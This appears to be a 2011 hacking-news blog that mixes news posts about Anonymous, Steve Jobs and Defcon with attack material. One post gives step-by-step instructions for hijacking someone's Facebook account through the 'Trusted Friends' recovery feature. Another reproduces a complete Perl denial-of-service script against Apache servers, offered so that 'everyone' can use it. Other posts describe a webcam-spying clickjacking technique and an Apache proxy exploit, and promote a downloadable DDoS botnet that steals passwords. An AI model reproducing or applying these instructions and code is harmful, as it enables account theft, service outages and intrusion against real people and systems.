Monday 31 October 2011

Anonymous Warns Maxican Drug Cartel

Anonymous have warned to expose members of Los Zetas unless they release kidnapped member of hacking collective.
The Zetas are one of the most notorious of several rival gangs of drug traffickers that have plagued Mexico over recent years. Over recent months, turf wars and escalating attacks have increased the death toll.
The Monterrey casino attack in August, which claimed the lives of 53 people, and the the 2011 Tamaulipas massacre, involving the mass murder of an estimated 190 plus abducted bus passengers back in April, were both blamed on the Zetas.
Some Zetas members are former Mexican Special Forces soldiers, the US Department of Homeland Security warns. A woman from Nuevo Laredo, Marisol Macias Castaneda, 39, was beheaded for posting about the Zetas on a local online discussion forum last month just days after two bloggers were found hanging from a bridge in the same northern Mexican border city.
If Anonymous follows through on its threat to expose details of the Zeta's operations, it will almost certainly result in further bloodshed. Analysts warned the Houston Chronicle that outing cartel members would leave bloggers and others more vulnerable to reprisal attacks by the cartel.

Exploiting "Facebook Trusted Friend" Security Feature

Last week Facebook announced that in one day 600,000 accounts possibly get hacked. Another possible solution for Facebook to combat security issues is to find 3 to 5 "Trusted friends". Facebook will be adding two new security features that will allow users to regain control of their account if it gets hijacked.

In Facebook's case, the keys are codes, and the user can choose from three to five "Trusted friends" who are then provided with a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to gain access to it again.  This method is used by hackers to hack most of the Facebook account using little bit of Social Engineering.


How to hack using this feature ? 


For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.
After success full addition of your fake accounts into victims account as friends follow the below steps .:


1. Go to Facebook and click Forgot your Password ?


2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.


3. After entering everything check it again and click on submit.
4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying 
No Longer Access to These click that one.
5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.


6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account. 
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Wednesday 26 October 2011

Anonymous Busts Child Porn Ring

Anonymous Busts Child Porn Ring

Hacker group Anonymous briefly crashed a large collection of child pornography Web sites, and published the names of its patrons.
Last week, the cyber vigilantes, better known for targeting large corporations and oppressive government regimes, used a brute force attack to infiltrate a server called Freedom Hosting, which housed about 40 child porn sites. The biggest site was Lolita City, which contained more than 100GB of content.
According to a timeline of events posted on Pastebin, Anonymous said before taking down the sites, it issued a warning to Freedom Hosting to remove the illegal content. When it failed to do so, Anonymous attacked. The sites were down for about five minutes before an admin restored them, upon which Anonymous again launched a successful attack. Later, the group posted on Pastebin the names of 1,589 individuals who visited Lolita City.
"If the FBI, Interpol, or other law enforcement agency should happen to come across this list, please use it to investigate and bring justice to the people listed here," Anonymous wrote in a statement.
The Anonymous operation was carried out by sub-group Operation Darknet, which targets abuse groups that swap images on the Tor network, an anonymous network routing service that hides a browser's location.
Hacker group Anonymous briefly crashed a large collection of child pornography Web sites, and published the names of its patrons.
Last week, the cyber vigilantes, better known for targeting large corporations and oppressive government regimes, used a brute force attack to infiltrate a server called Freedom Hosting, which housed about 40 child porn sites. The biggest site was Lolita City, which contained more than 100GB of content.
According to a timeline of events posted on Pastebin, Anonymous said before taking down the sites, it issued a warning to Freedom Hosting to remove the illegal content. When it failed to do so, Anonymous attacked. The sites were down for about five minutes before an admin restored them, upon which Anonymous again launched a successful attack. Later, the group posted on Pastebin the names of 1,589 individuals who visited Lolita City.
"If the FBI, Interpol, or other law enforcement agency should happen to come across this list, please use it to investigate and bring justice to the people listed here," Anonymous wrote in a statement.
The Anonymous operation was carried out by sub-group Operation Darknet, which targets abuse groups that swap images on the Tor network, an anonymous network routing service that hides a browser's location.
#OpDarknet calls Freedom Hosting "enemy number one" and is demanding the server remove all child porn content from the site and deny hosting services to any future child porn Web sites. "We will continue to not only crash Freedom Hosting's server, but any other server we find to contain, promote, or support child pornography," they said.

Anonymous, a controversial hacker coalition better known for releasing police department emails and launching denial of service attacks against Sony, has received more support than usual for this latest attack against an undeniable moral enemy.
"Anonymous pwned a bunch of pedos; huzzah," tweeted @ioerror, or Jake Appelbaum.
"I totaly [sic] support this kind of hacking. Well done," tweeted Kat Corbett, a host for KROQ radio station in Los Angeles.
Others, like security expert Graham Cluley of Sophos, disagreed with Anonymous' action.
"Their intentions may have been good, but take-downs of illegal Web sites and sharing networks should be done by the authorities, not internet vigilantes," he wrote in a blog post. "When 'amateurs' attack there is always the risk that they are compromising an existing investigation, preventing the police from gathering the necessary evidence they require for a successful prosecution, or making it difficult to argue that evidence has not been corrupted by hackers."
In early August, the Justice Department announced that it had dismantled a members-only child porn Internet bulletin board that was intended to promote pedophilia.

Sunday 23 October 2011

Apache Server 2.3.14 Denial of Service Exploit



A security vulnerability have been found on Latest version of Apache Server 2.3.14 . This vulnerability was discovered by Egyptian hacker/exploit writer Xen0n . He developed an perl exploit making everyone capable to exploit this vulnerability 






#!/usr/bin/perl -w
# Exploit Title: Apache Server 2.3.14 <= Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us xenon.sec@gmail.com
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
ooooooo ooooo .oooo.
`8888 d8' d8P'`Y8b
Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo.
`8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b
.8PY888. 888ooo888 888 888 888 888 888 888
d8' `888b 888 .o 888 888 `88b d88' 888 888
o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o
Welcome to Xen0n Apache Attacker
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,);
if ($version) {
print "Version 1.0\n";
exit;
}
unless ($host) {
print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
print "\n\temail: xenon.sec@ gmail.com\n";
print "\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Xen0n will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($xenon) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "1", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "Testing $host could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now just wait...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Xen0n closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Xen0n against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Attacking $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
# 1337day.com [2011-10-22]

Thursday 20 October 2011

Adobe Flash Bug | Spy On The Webcams of Your Website Visitors

A slight variation of a previously designed clickjacking attack that used a Adobe Flash vulnerability has once again made it possible for website administrators to surreptitiously spy on their visitors by turning on the user's computer webcam and microphone.
It works in all versions of Adobe Flash that the researcher have tested . He’ve confirmed that it works in the Firefox and Safari for Mac browsers. Use one of those if you check out the live demo. There’s a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux).
Clickjacking + Adobe Flash = Sad Times!
This attack works by using a neat variation of the normal clickjacking technique that spammers and other bad people are using in the wild right now. For the uninitiated:
Combine clickjacking with the Adobe Flash Player Setting Manager pageand you have a recipe for some sad times.

How the attack works ?

Instead of iframing the whole settings page (which contains the framebusting code), Just  iframe the settings SWF file. This  bypasses the framebusting JavaScript code, since we don’t load the whole page — just the remote .SWF file. I was really surprised to find out that this actually works!
 A bunch of clickjacking attacks in the wild,  never any attacks where the attacker iframes a SWF file from a remote domain to clickjack it — let alone a .SWF file as important as one that controls access to your webcam and mic!
The problem here is the Flash Player Setting Manager, this inheritance from Macromedia might be the Flash Player security Achilles heel.
This is a screenshot of what the Settings Manager .SWF file looks like:

Adobe Flash Settings Manager


| Source | 

Tuesday 11 October 2011

Apache mod_proxy Proof of Concept (CVE-2011-3368)

A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:



Description
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.


SECFORCE has developed a proof of concept for this vulnerability .The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall. Click here to download the POC.


Usage :- 
rmacros@laptop2: python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos
http://www.secforce.co.uk
usage():
python apache_scan.py [options]
 [options]
-r: Remote Apache host
-p: Remote Apache port (default is 80)
-u: URL on the remote web server (default is /)
-d: Host in the DMZ (default is 127.0.0.1)
-e: Port in the DMZ (enables 'single port scan')
-g: GET request to the host in the DMZ (default is /)
-h: Help page
examples:
 - Port scan of the remote host
python apache_scan.py -r www.example.com -u /img/test.gif
 - Port scan of a host in the DMZ
python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local
- Retrieve a resource from a host in the DMZ
python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local -e 80 -g /accounts/index.html
The following screenshot shows the result of the command above:
| source | 

Monday 10 October 2011

Optima DDOS 10a Botnet Download

Do

"Optima DDOS 10a Botnet" full version posted for all to download and use. Complete new version of the acclaimed DDoS bot Optima Darkness. In this new version 10a according to the author was raised in secrecy bot system and optimized grabber passwords. It cost about $ 600 worth.


Features of the bot :-

  • DDoS attacks of three types - http flood, icmp-flood, syn-flood.
  • Theft of stored passwords from some applications installed on the victim's system, details below.
  • Opening on the infected system proxy Socks5.
  • The possibility of cheating various counters on the websites (http-access the sites).
  • Hidden download and run the specified file to the affected systems.
  • Installed in the system as a service
  • Weight bot - 95.5 kb, written in Delphi.



Saturday 8 October 2011

fuse.microsoft.com Defaced by Hmei7

Microsoft FUSE Labs Sub-domain defaced by Hmei7

fuse.microsoft.com The official sud-domain of Microsoft FUSE Labs was defaced by a hacker named "Hmei7". Mirror of hack at Zone-H can be found here.

Wednesday 5 October 2011

steve jobs passed away

steve jobs passed away :(  may his soul rest in peace.One of the greatest visionary ever!
Steve Jobs, the mastermind behind Apple's iPhone, iPad, iPod, iMac and iTunes, has died in California. Jobs was 56.
His death was reported by The Associated Press, citing Apple.
Jobs co-founded Apple Computer in 1976 and, with his childhood friend Steve Wozniak, marketed what was considered the world's first personal computer, the Apple II.
Industry watchers called him a master innovator -- perhaps on a par with Thomas Edison -- changing the worlds of computing, recorded music and communications.
In 2004, he beat back an unusual form of pancreatic cancer, and in 2009 he was forced to get a liver transplant. After several years of failing health, Jobs announced on Aug. 24, 2011 that he was stepping down as Apple's chief executive.
"I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple's CEO, I would be the first to let you know," Jobs wrote in his letter of resignation. "Unfortunately, that day has come."

One of the world's most famous CEOs, Jobs remained stubbornly private about his personal life, refusing interviews and shielding his wife and their children from public view.


A Collection of 60 Inspirational Steve Jobs Quotes About Life, Design and Apple“Sometimes when you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations.”

“Being the richest man in the cemetery doesn’t matter to me … Going to bed at night saying we’ve done something wonderful… that’s what matters to me.”

“We’ve gone through the operating system and looked at everything and asked how can we simplify this and make it more powerful at the same time.”

“Be a yardstick of quality. Some people aren’t used to an environment where excellence is expected.”

“I want to put a ding in the universe.”

“I was worth over $1,000,000 when I was 23, and over $10,000,000 when I was 24, and over $100,000,000 when I was 25, and it wasn’t that important because I never did it for the money.”

“The Japanese have hit the shores like dead fish. They’re just like dead fish washing up on the shores.”

“Unfortunately, people are not rebelling against Microsoft. They don’t know any better.”

“Bill Gates‘d be a broader guy if he had dropped acid once or gone off to an ashram when he was younger.”

“The only problem with Microsoft is they just have no taste. They have absolutely no taste. And I don’t mean that in a small way, I mean that in a big way, in the sense that they don’t think of original ideas, and they don’t bring much culture into their products.”



“My job is to not be easy on people. My job is to make them better.”

“We made the buttons on the screen look so good you’ll want to lick them.”

“Click. Boom. Amazing!”

“You can’t just ask customers what they want and then try to give that to them. By the time you get it built, they’ll want something new.”

“Design is not just what it looks like and feels like. Design is how it works.”

“Why join the navy if you can be a pirate?”

“A lot of companies have chosen to downsize, and maybe that was the right thing for them. We chose a different path. Our belief was that if we kept putting great products in front of customers, they would continue to open their wallets.”

“Innovation distinguishes between a leader and a follower.”

“Recruiting is hard. It’s just finding the needles in the haystack. You can’t know enough in a one-hour interview.
So, in the end, it’s ultimately based on your gut. How do I feel about this person? What are they like when they’re challenged? I ask everybody that: ‘Why are you here?’ The answers themselves are not what you’re looking for. It’s the meta-data.”

“We’ve had one of these before, when the dot-com bubble burst. What I told our company was that we were just going to invest our way through the downturn, that we weren’t going to lay off people, that we’d taken a tremendous amount of effort to get them into Apple in the first place – the last thing we were going to do is lay them off.”

“I mean, some people say, ‘Oh, God, if [Jobs] got run over by a bus, Apple would be in trouble.’ And, you know, I think it wouldn’t be a party, but there are really capable people at Apple.
My job is to make the whole executive team good enough to be successors, so that’s what I try to do.”

“It’s not about pop culture, and it’s not about fooling people, and it’s not about convincing people that they want something they don’t. We figure out what we want. And I think we’re pretty good at having the right discipline to think through whether a lot of other people are going to want it, too. That’s what we get paid to do.
We just want to make great products. (I think he means “insanely great products!“)”

“So when a good idea comes, you know, part of my job is to move it around, just see what different people think, get people talking about it, argue with people about it, get ideas moving among that group of 100 people, get different people together to explore different aspects of it quietly, and, you know – just explore things.”

“When I hire somebody really senior, competence is the ante. They have to be really smart. But the real issue for me is, Are they going to fall in love with Apple? Because if they fall in love with Apple, everything else will take care of itself.
They’ll want to do what’s best for Apple, not what’s best for them, what’s best for Steve, or anybody else. (this actually reiterates my oft-repeated mantra of “ubiquitous evangelism” in companies)”



“People think focus means saying yes to the thing you’ve got to focus on. But that’s not what it means at all. It means saying no to the hundred other good ideas that there are. You have to pick carefully.”

“Our DNA is as a consumer company – for that inpidual customer who’s voting thumbs up or thumbs down. That’s who we think about. And we think that our job is to take responsibility for the complete user experience. And if it’s not up to par, it’s our fault, plain and simply.”

“That happens more than you think, because this is not just engineering and science. There is art, too. Sometimes when you’re in the middle of one of these crises, you’re not sure you’re going to make it to the other end. But we’ve always made it, and so we have a certain degree of confidence, although sometimes you wonder.

I think the key thing is that we’re not all terrified at the same time. I mean, we do put our heart and soul into these things.”

“We don’t get a chance to do that many things, and every one should be really excellent. Because this is our life.

Life is brief, and then you die, you know?

And we’ve all chosen to do this with our lives. So it better be damn good. It better be worth it.”

“Almost everything–all external expectations, all pride, all fear of embarrassment or failure–these things just fall away in the face of death, leaving only what is truly important. Remembering that you are going to die is the best way I know to avoid the trap of thinking you have something to lose. You are already naked. There is no reason not to follow your heart.”

“Here’s to the crazy ones, the misfits, the rebels, the troublemakers, the round pegs in the square holes… the ones who see things differently — they’re not fond of rules… You can quote them, disagree with them, glorify or vilify them, but the only thing you can’t do is ignore them because they change things… they push the human race forward, and while some may see them as the crazy ones, we see genius, because the ones who are crazy enough to think that they can change the world, are the ones who do.”

“In most people’s vocabularies, design means veneer. It’s interior decorating. It’s the fabric of the curtains of the sofa. But to me, nothing could be further from the meaning of design. Design is the fundamental soul of a human-made creation that ends up expressing itself in successive outer layers of the product or service.”



“So we went to Atari and said, ‘Hey, we’ve got this amazing thing, even built with some of your parts, and what do you think about funding us? Or we’ll give it to you. We just want to do it. Pay our salary, we’ll come work for you.’ And they said, ‘No.’ So then we went to Hewlett-Packard, and they said, ‘Hey, we don’t need you. You haven’t got through college yet.”

“The people who are doing the work are the moving force behind the Macintosh. My job is to create a space for them, to clear out the rest of the organization and keep it at bay.”

“Your time is limited, so don’t waste it living someone else’s life. Don’t be trapped by dogma – which is living with the results of other people’s thinking. Don’t let the noise of other’s opinions drown out your own inner voice. And most important, have the courage to follow your heart and intuition. They somehow already know what you truly want to become. Everything else is secondary.”

“I’m the only person I know that’s lost a quarter of a billion dollars in one year…. It’s very character-building.”

“I’m as proud of what we don’t do as I am of what we do.”

“Quality is more important than quantity. One home run is much better than two doubles.”

“I’ve always wanted to own and control the primary technology in everything we do.”

“It comes from saying no to 1,000 things to make sure we don’t get on the wrong track or try to do too much.”

“It’s really hard to design products by focus groups. A lot of times, people don’t know what they want until you show it to them.”

“Innovation has nothing to do with how many R&amp;D dollars you have. When Apple came up with the Mac, IBM was spending at least 100 times more on R&amp;D. It’s not about money. It’s about the people you have, how you’re led, and how much you get it.”

“Insanely Great!”

“I’m convinced that about half of what separates the successful entrepreneurs from the non-successful ones is pure perseverance.”

“It’s rare that you see an artist in his 30s or 40s able to really contribute something amazing.”



“I feel like somebody just punched me in the stomach and knocked all my wind out. I’m only 30 years old and I want to have a chance to continue creating things. I know I’ve got at least one more great computer in me. And Apple is not going to give me a chance to do that.”

“I didn’t see it then, but it turned out that getting fired from Apple was the best thing that could have ever happened to me. The heaviness of being successful was replaced by the lightness of being a beginner again, less sure about everything. It freed me to enter one of the most creative periods of my life.”

“Do you want to spend the rest of your life selling sugared water or do you want a chance to change the world?”

“The products suck! There’s no sex in them anymore!”

“The cure for Apple is not cost-cutting. The cure for Apple is to innovate its way out of its current predicament.”

“If I were running Apple, I would milk the Macintosh for all it’s worth — and get busy on the next great thing. The PC wars are over. Done. Microsoft won a long time ago.”

“You know, I’ve got a plan that could rescue Apple. I can’t say any more than that it’s the perfect product and the perfect strategy for Apple. But nobody there will listen to me.”

“Apple has some tremendous assets, but I believe without some attention, the company could, could, could — I’m searching for the right word — could, could die.”

Thank you Steve.
you will be missed steve :(

Sunday 2 October 2011

Defcon 19 presentations with dvd

Finally the wait for Defcon 19 presentation is over. Dvd containing the hacker material is up on Defcon media. Defcon is a yearly hacker conference which was held at las vegas in august this year.

Here is the download link to defcon 19 dvd
.ISO of the DEF CON 19 Conference DVD - original and with updated slides
dc-19/defcon-19-dvd-original.iso (~1.6 GB)
dc-19/defcon-19-dvd-updated.iso (~1.7 GB)

Link for individual rss feeds of defcon slides
https://www.defcon.org/podcast/defcon-19-materials.rss

next update will be of defcon videos, music.


Subscribe to our mailing list so you don't miss any updates.